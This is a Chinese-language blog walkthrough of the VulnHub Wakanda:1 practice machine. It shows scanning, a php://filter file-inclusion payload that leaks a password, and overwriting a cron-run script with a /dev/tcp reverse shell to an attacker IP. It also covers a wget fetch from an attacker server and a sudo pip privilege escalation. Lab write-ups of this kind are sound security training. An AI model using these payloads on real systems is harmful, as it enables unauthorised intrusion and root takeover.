wakanda:1靶机渗透测试

于 2024-08-08 21:18:22 发布
阅读量366 收藏 10
点赞数 8
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/141036513
版权

一、靶机下载地址

https://download.vulnhub.com/wakanda/wakanda-1.ova

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.222.0/24 -sn | grep -B 2 "08:00:27:ED:98:E1"

2、端口扫描

# 使用命令
nmap 192.168.222.149 -p- -sV

3、指纹识别

# 使用命令
whatweb 192.168.222.149

4、目录扫描

# 使用命令
dirsearch -u  "http://192.168.222.149"

三、获取shell

1、访问靶机IP地址

2、右击查看源代码

从网页源码上看给了一个参数,拼接访问一下index.php,因为他是脚本文件,不过得删除.php后缀才可以访问成功

lang表示可以随意切换网站的语言,在这里?lang=fr表示语言为法语,可以设置成中文,英语等语言,既然这个lang可以改变语言,那么说明改变语言使用了语言php文件,那么关联的就是文件包含漏洞了,页面没什么可以下手的地方,那我们就构造url,这里就关联到一个知识点,也是我们要用到的:php://filter.它是php中一个独有的协议,它作为一个中间流来处理其流,比如我们可以将我们手上的源码用base64解码来dowm下来.

/?lang=php://filter/read=convert.base64-encode/resource=index

base64解码,得到了一个password:Niamey4Ever227!!!

3、由于开放了3333端口,3333端口用于连接ssh,而连接ssh则需要用户名和密码,密码是有了,但是用户名没有,再反过web页面看一下,底下有作者,尝试一下

# 使用命令
ssh mamadou@192.168.222.149 -p 3333

# 密码
Niamey4Ever227!!!

4、执行命令,发现执行不出来,这是开启了python shell ,只能通过函数来执行命令,很麻烦,因此,我们利用python shell再开启一个bash shell

# 使用命令
import os

os.system("/bin/bash")

5、输入ls命令,发现第一个flag文件

6、再次进行目录翻找,发现了第2个flag,在目录/home/devops目录下,这应该是两个用户目录,进行查看,发现没有权限

7、无法执行sudo -l提权,翻看tmp目录,发现,test文件每隔五分钟就会被修改一次,说明有一个定时任务在不断被调用,/srv多用来存放系统服务类脚本的多,最后在srv下找到了这个定期运行文件

# 使用命令
cd /tmp
ls -al

8、尝试将.antivirus.py的内容修改为如下内容

f=open('/home/devops/flag2.txt', 'r').read()
open('/tmp/flag.txt','w').write(f)
# 使用命令
echo "f=open('/home/devops/flag2.txt', 'r').read()" > .antivirus.py
echo "open('/tmp/flag.txt','w').write(f)" >> .antivirus.py

9、几分钟后查看tmp目录,果然出现了flag.txt,读取便获得了第二个flag

10、用devops用户身份创建一个shell,所以要转到这个用户,将.antivirus.py内容改为

import os
os.system("echo \'bash -i >& /dev/tcp/192.168.222.41/6767 0>&1\'|bash")

11、尝试了很多方法,发现写不进去内容,故将内容写到kali上然后用wget命令下载下来

# 使用命令
vim python.py

python3 -m http.server

12、使用wget命令进行远程下载

# 使用命令
wget http://192.168.222.41:8000/python.py

13、进行文件替换

# 使用命令
cp python.py /srv/.antivirus.py

14、进行监听6767端口,该脚本会自动执行,只需等待几分钟就会连接

# 使用命令
nc -lvnp 6767

四、提权

1、输入sudo -l命令查看可执行的命令

2、发现pip不需要密码,创建一个恶意setup.py并上传到tmp目录,和上面的方法一样,创建文件,并远程下载到/tmp目录下面

# 使用命令
vim srtup.py

python3 -m http.server

wget http://192.168.222.41/srtup.py

3、攻击机开启nc监听端口,控制靶机执行

# 使用命令
sudo -H /usr/bin/pip install . --upgrade --force-reinstall

4、查看最后一个flag

果冻*果冻*
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Neos的渗透测试靶机练习——Wakanda
qq_38678845的博客
01-19 2880
一次渗透测试靶机练习,希望对我们能有所帮助。
漏洞payload 靶机_靶机渗透测试--hack the wakanda
weixin_29547309的博客
12-23 914
大家好,本文向大家介绍一个CTF挑战靶机Wakanda,下载地址在这里。该靶机难度适中,共有三个flag(flag1.txt,flag2.txt和root.txt)。渗透测试方法如下网络扫描(Nmap,netdiscover)HTTP服务遍历Php filter协议利用LFI漏洞密码base64解码SSH登陆获取第一个flag查找属于devops用户的文件Antivirus.py文件写入恶意pyt...
VulnHub实战篇二:Wakanda-1靶机渗透记录
a1004070060的博客
04-05 1044
0x01靶机信息 靶机名称:Wakanda-1 下载地址:https://download.vulnhub.com/wakanda/wakanda-1.ova 操作系统:debian 渗透目标:获取root权限,取得三个flag 0x02信息搜集 1.主机信息扫描 本地虚拟机搭建完环境后无法获悉靶机地址,需要使用主机探测工具扫描一下ip,这里使用nmap,命令如下。 nma...
靶机wakanda_1练习报告
黑战士的博客
05-21 529
1.熟练使用多种提权方法。
vulnerable靶机wakanda渗透测试笔记
kwist_jay的博客
07-30 785
首先我们从网站上下载靶机wakanda-1的ova文件安装(最好是在virtual box上,vm上安装较为麻烦),我的kali在vm上,于是把靶机和kali放在同一个网段就行了,我做的是把kali和wakanda桥接到同一个物理网卡上。 在kali上面探测一下内网存活的主机,这里有人喜欢用nmap,写个脚本自动ping,不过也可以用kali的工具netdiscover。 root@kali:~# netdiscover -i eth0 发现他的主机ip 192.168.0.137 ...
Vulnhub靶机Wakanda渗透测试攻略
10-15 3845
前言 Wakanda是一个新的交易市场网站,很快会上线了。你的目标是通过黑客技术找到“振金”的确切位置。 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnhub,这台靶机上包含了很多很酷的技巧。 百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导...
渗透测试靶机试炼(四)
simple___sunny的博客
01-23 760
靶机简介 靶机地址: https://www.vulnhub.com/entry/wakanda-1,251/# 运行环境: VirtualBox 攻击测试机环境 kali win 10 工具简介 msf dirb nmap nc python 靶机网卡设置 三台虚拟主机在同一局域网即可 作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。 信息收集 靶机没有给出ip,使用nmap主...
【网络安全】记一次红队渗透实战项目
qingkahui24689的博客
06-03 1444
mcrypt 是php里面重要的加密支持扩展库,主要是用mcrypt 扩展库中各种加密函数对用户输入内容进行转换功能。就是用户输入的数据转换为base64编码和解码功能,还有将字符串转换为 8-bit 字符串功能。PHP存在四种过滤器:
core-Wakanda:核心-瓦坎达
07-12
Wakanda 由几个部分组成,每个部分都有自己的存储库。实现 Wakanda Server 的应用程序逻辑。 跨平台 C++ 框架,可简化在 Windows、OSX、Linux 上移植 wakanda 服务器。 它还提供有关图形、网络、xml、javascript 的...
ionic-starter-wakanda:Ionic Wakanda 的空白启动项目
07-17
它缺少 Ionic 库和 Angular-Wakanda。 要使用它,请使用 ionic node.js 实用程序创建一个新的 ionic 项目,或者将其复制并粘贴到现有的 Cordova 项目中,然后单独下载 Ionic 的发行版。 先决条件 当然你需要节点,...
todo-wakanda:用wakanda创建的一个简单的待办事项应用
04-28
wakanda创建的一个简单的待办事项应用 可以从以下获得演示: : 本地运行 确保已安装 ,然后运行以下命令: $ git clone https://github.com/midrissi/todo-wakanda.git $ cd todo-wakanda $ npm i 然后用...
WQUnit:Wakanda 的 QUnit 单元测试小部件
06-21
自定义小部件代码可以在设计器(来自 Wakanda GUI 设计器)和运行时模式中独立测试。 如何安装 您可以使用 Wakanda Studio 安装 QUnit 小部件。 有关更多信息,请参阅手册。 如何使用 将QUnit小部件拖放到 Wakanda...
MemoryLeakSolution:用于内存泄漏检测的 Wakanda 解决方案重组单元测试
07-16
Wakanda解决方案强调在单元测试中重组测试用例,以确保每次测试运行后都恢复到初始状态。这包括: - **测试前后的内存清理**:在每个测试用例开始前和结束后,使用Wakanda进行内存快照并比较,确保没有额外的内存...
web安全基础学习
m0_71332744的博客
07-31 588
记录学习的原理,少有实操持续更新
C++在网络安全领域的应用
2302_79331124的博客
08-04 977
总的来说,C++在网络安全领域的应用广泛且深入。其高性能、灵活性和对底层硬件的控制使其成为开发各种安全解决方案的理想选择。随着网络安全威胁的不断演变,C++将继续在保护数字世界的过程中发挥重要作用。如果你对网络安全感兴趣,学习和掌握C++无疑将为你的技术发展方面提供强大的助力。
网络安全(黑客)—自学手册
dexi113的博客
08-05 1251
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
web安全】权限漏洞之未授权访问
qq_70836100的博客
08-04 895
漏洞修复:1.设置防火墙策略,限定 IP 访问服务。2.在admin.system.users中添加用户,启动认证。漏洞修复:1.修改绑定的IP、端口和指定访问者IP。步骤二:进入执行页面http://xxx.xxx.xxx.xxx:xxxx/manage/script/index.php。漏洞修复:1.禁止使用root权限启动redis服务。漏洞修复:1.为ZooKeeper配置相应的访问权限。漏洞修复:1.开启身份验证,防止未经授权用户访问。stat:列出关于性能和连接的客户端的统计信息。
自学黑客(网络安全
最新发布
2301_77160226的博客
08-05 7005
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全数字化转型
2401_84466325的博客
08-04 780
从狭义层面来看,是指依托先进的数据处理技术,包括数据采集的全面性、数据治理的规范性、数据分析的深入性、数据关联的精准性以及数据应用的有效性,来直接应对并解决当前网络安全领域所面临的挑战与问题。这一过程不仅为网络安全工作的决策提供了坚实的数据基础与科学依据,还显著区别于传统网络安全模式——传统告警信息已不再是主导分析的核心数据,而是转变为辅助决策的参考信息,体现了网络安全分析重心的深刻转变与升级。而从广义视角审视,数字化网络安全则是围绕数据这一核心要素,构建了一个动态优化的安全生态体系。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值